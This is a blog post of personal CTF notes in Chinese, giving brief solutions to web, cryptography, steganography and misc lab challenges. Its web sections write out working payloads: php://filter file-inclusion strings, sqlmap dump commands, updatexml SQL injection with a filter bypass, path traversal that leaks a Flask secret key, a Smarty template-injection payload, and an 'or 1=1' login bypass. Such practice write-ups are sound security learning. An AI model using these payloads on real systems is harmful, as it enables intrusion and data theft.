欢迎光临散文网 会员登陆 & 注册

我不说你怎么会知道是这篇文章

2023-06-25 15:17 作者:注册一个小号这么难吗  | 我要投稿

# CTF笔记


# **WEB-签到题**


F12查看源代码


# **密码学-密码学签到题**


文本反转


# **密码学-邮件编码**


Quoted-Printable解密http://www.metools.info/code/quotedprintable231.html


# **密码学-Unicode编码**


**Unicode解密**http://www.atoolbox.net/Tool.php?Id=670


# **隐写-娃哈哈**


1、下载图片


2、文本打开图片拉到底端找到flag


# **密码学-**风中密语


百家姓解密http://www.atoolbox.net/Tool.php?Id=1050


# **密码学-佛前顿悟**


与佛论禅加密http://www.atoolbox.net/Tool.php?Id=1027


# **密码学-事不过三**


Base64解密三次https://tool.chinaz.com/tools/base64.aspx


# WEB-**文件包含**


教学文件中有


`file=php://filter/read=convert.base64-encode/resource=xxx.php`构造语句


# 隐写-猜一猜


百度百科宋茜英文名


# WEB-SQL盲注1


https://blog.csdn.net/qq_48511129/article/details/113180080?ydreferer=aHR0cHM6Ly9wYXNzcG9ydC5jc2RuLm5ldC9sb2dpbj9jb2RlPWFwcGxldHM%3D


1、改Header:index.php?file=php://filter/read=convert.[base64](https://so.csdn.net/so/search?q=base64&spm=1001.2101.3001.7020)-encode/resource=index.php


SQLmap


1、python [sqlmap.py](http://sqlmap.py/) -u"靶机URL" --current-db 查看数据库名


2、python [sqlmap.py](http://sqlmap.py/) -u"靶机URL" -D note –tables 查看数据库表


3、python [sqlmap.py](http://sqlmap.py/) -u"靶机URL" -D note -T fl4g –columns 查看表字段


4、python sqlmap.py -u"靶机URL” -D note -T f14g -C fllllag -dump 获取字段值


# WEB-SQL盲注2


https://www.cnblogs.com/zhengna/p/15931584.html


Burp suit


POST情况下


1、尝试获取当前数据库的库名


`name=xxx' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+&pass=xxx`


2、获取表名


`name=xxx' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+&pass=xxx`


报错说明我们的sql语句被进行了某种替换,导致语法错误。尝试双写绕过(不明白为啥第一次没报错?)


`name=xxx' and updatexml(1,concat(0x7e,(selselectect group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+&pass=xxx`


3.获取字段名


`name=xxx' and updatexml(1,concat(0x7e,(selselectect group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'),0x7e),1)--+&pass=xxx`


4、获取flag


`name=xxx' and updatexml(1,concat(0x7e,(selselectect flag from fl4g),0x7e),1)--+&pass=xxx`


5、长度过长,使用Right()等字符串函数处理获取Flag


# **WEB-任意文件读取2**


https://blog.csdn.net/CyhDl666/article/details/114829646


1、构造article?name=../../../proc/self/cwd/key.py查看key


2、使用flask_session_cookie_manager3加密key值


3、使用Burp Suit抓包Post,并修改Session值请求获取Flag


# **WEB-简单题**


https://blog.csdn.net/weixin_63957412/article/details/122952766


1、修改go.php为Index.PHP


2、在F12的监控中查看Index.php的信息,或者使用Burp Suit抓包Index.PHP获得Flag


# **WEB-找到FLAG**


https://blog.csdn.net/qq_54786552/article/details/118732644


https://blog.csdn.net/qq_53689523/article/details/128900366


1、构造?file=php:*//filter/read=convert.base64-encode/resource=flag.php*


2、获取key使用Base64解码


https://tool.chinaz.com/tools/base64.aspx


3、获得Flag


# **MISC-雾里看花**


1、下载ZIP解压


2、使用010Editor查看解压的word文件,发现文件头是压缩包


3、把word改成ZIP解压


4、打开文件夹逐个文件用文本打开找Flag


# 隐写-看图找旗


1、010Editor打开发现图片文件后有压缩包


2、拿出来解压得到TXT,Base64解码获得key:f{ysrolye_yoau_v_lge13c}


https://tool.chinaz.com/tools/base64.aspx


3、跳格子获得flag


# **WEB-弱机网站**


https://blog.csdn.net/hivjianxian/article/details/127991459


关键词:目录穿透漏洞


1、URL直接访问/img..


# **(藏宝题)MISC-伪加密**


https://blog.csdn.net/xiaozhaidada/article/details/124538768


关键词:伪加密


1、下载压缩包


2、用010editor打开后修改50 4B 03 04 14 00,50 4B 01 02 1F 00 14 00两处后全局参数09 00至00 00


# **WEB-层层推进**


1、F12查看源码,有一个SO的html,无限往下点到404.tml,获得Flag


# **隐写-抽丝剥茧**


1、用010editor打开图片,发现有一个图片和一个压缩包,删掉图片部分改后缀为zip


2、用文本打开原来的图片部分,发现有key,用Unicode解密后获得密码


3、打开压缩包获得flag


# **隐写-穷图末路**


1、010打开图片,发现后面有一串地址,从data:开始全部复制下来,浏览器输入访问


# **MISC-ROT13**


1、Base64解密


2、rot13解密


# **MISC-键盘钩子hook**


聪明的自己翻译


笨的(但直接方便,主要是还要看英文意思):


1、打开vim编辑界面


2、根据指令操作一遍


# **(藏宝题) 秘密藏在我家的金库里**


关键词:二次注入


https://mp.weixin.qq.com/s/iHbj-En5xTcKf-NDyVLZbQ


1、通过dirsearchj进行目录爆破发现register.php


2、注册账号1232@qq.com;test;test登录,用户名显示在登录后的页面上。


3、这样这里有可能存在二次注入,当我们注册时,后台的SQL语句大概类似于


Insert into users (email,username,password) VALUES ([1232@qq.com](mailto:1232@qq.com),test,test)


4、使用代码爆破


# **(藏宝题) 名侦探很难**


1、直接输入admin,password登入


2、F12修改cookie的normal_user为admin_user


# **隐写-变形金刚**


1、下载图片,使用010Editor打开发现高度有问题


2、修改高度为03 20,查看图片下方出现二维码


3、扫码获得Flag


# **密码学-共模攻击**


https://blog.csdn.net/shuaicenglou3032/article/details/117934550


关键词:RSA原理 ****CommonModulus(英文都不会搜啊)****


1、看代码找原理,找公因数


2、python写反向代码处理,不行可循环爆破


# **密码学-未知文明的秘密**


# **web-前端加密**


1、控制台直接运行指定函数获取密码


2、通过密码登入获取Flag


# **MISC-拦截日志**


https://blog.csdn.net/zippo1234/article/details/109376357


https://ctftime.org/writeup/15211


# **(藏宝题)PPC编程-好玩的密钥**


# **爱的信号(6月10日藏宝题)**


# **火星来电(CRYPTO2)**


关键词:AAencode


1、AAencode解密


# **变形记(STEGA4)**


1、用010editor打开图片,发现有一个图片一个压缩包,将文件分离


2、修改图片高度看到压缩包密码


3、打开压缩包获取flag


# **邮件解密(STEGA2)**


1、010打开文件,发现文件头是504b0304,binwalk分析后看到该文件就是个压缩包


2、文件后缀改为zip,发现要密码


3、文件尾是密码解压出pic.txt,data开始复制进浏览器即可,二维码扫出来就是flag


# **爱情甜如蜜(Web5)**


https://blog.csdn.net/qq_46263951/article/details/119703207


[https://blog.csdn.net/CyhDl666/article/details/114891629?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168555016116800192229598%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168555016116800192229598&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-114891629-null-null.142^v88^insert_down1,239^v2^insert_chatgpt&utm_term=ctf the honey shop&spm=1018.2226.3001.4187](https://blog.csdn.net/CyhDl666/article/details/114891629?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168555016116800192229598%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168555016116800192229598&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-114891629-null-null.142%5Ev88%5Einsert_down1,239%5Ev2%5Einsert_chatgpt&utm_term=ctf%20the%20honey%20shop&spm=1018.2226.3001.4187)


1、Burp suit抓包下载图片,读取构造../../../../../../../proc/self/environ获得SECRET_KEY=Nllt8SF3wxTkry3MDNYl0aGOtgJWu8YyvsakTKIc‘


2、通过flask-session-cookie-manager加密SECRET_KEY获得Session:eyJiYWxhbmNlIjo5OTk5OX0.ZIg2Pw.C-n5B2COZMP0OD4z7qsabUTmf2o


3、F12修改网站Session余额变为9999,购买Flag商品获得Flag


# **你说什么就是什么咯(Web1)**


https://blog.csdn.net/qq_53106085/article/details/120807244


关键词:伪造XFF


1、抓包靶机


2、添加Referer: https://www.sgmw.com.cn/


# **障眼法(STEGA1)**


1、010editor打开图片,看到有CRC报错,爆破CRC码获得初始宽高


2、修改高度获得Flag


# **百密一疏(Web4)**


关键词:XML外部实体攻击,XML文件格式


本质:把`php://filter/convert.base64-encode/resource=/../flag.txt通过XML传输获取Flag`


1、构造XML文件


[x16.xml](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/3ace1085-2780-40ce-8e95-5925934382d7/x16.xml)


2、上传文件获得key


3、Base64解码


# **跳板机(Web6)**


https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121490787?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165450595316781683923987%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=165450595316781683923987&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-2-121490787-null-null.142


# **蛛丝马迹(Web3)**


1、Burp suit抓包get,在Response中获得Flag


# **保护好你的API(Web02)**


关键词:****SmartySSTi,SSTi****


https://www.freebuf.com/articles/web/264615.html


1、url+/xff


2、payload:X-Forwarded-For: {if var_dump(file_get_contents('/flag')) }{/if}


# **脆弱的网站**


https://zhuanlan.zhihu.com/p/78989602


# **我爱数学**


https://www.cnblogs.com/20175211lyz/p/11588219.html


# **我命由我不由天(中)**


https://blog.csdn.net/weixin_43272781/article/details/94380078


# 谍影重重


关键词:万能密码,SQL注入


1、admin' or 1=1-- -


# 卷土重来


1、账号:admin,密码:sgmwctf


2、SQLmap爆破add_to_Car获得密码sglmap -u "靶机URL/add_to_cart" —data “product id=1” --method POST --tables


# 一千次的执着


(出题BUG,实际应该编写脚本请求1000次)


1、F12申请两次发现cookie有个参数变成2


2、抓包cookie有明显的失败请求参数,修改为1000发送请求返回Flag

我不说你怎么会知道是这篇文章的评论 (共 条)

分享到微博请遵守国家法律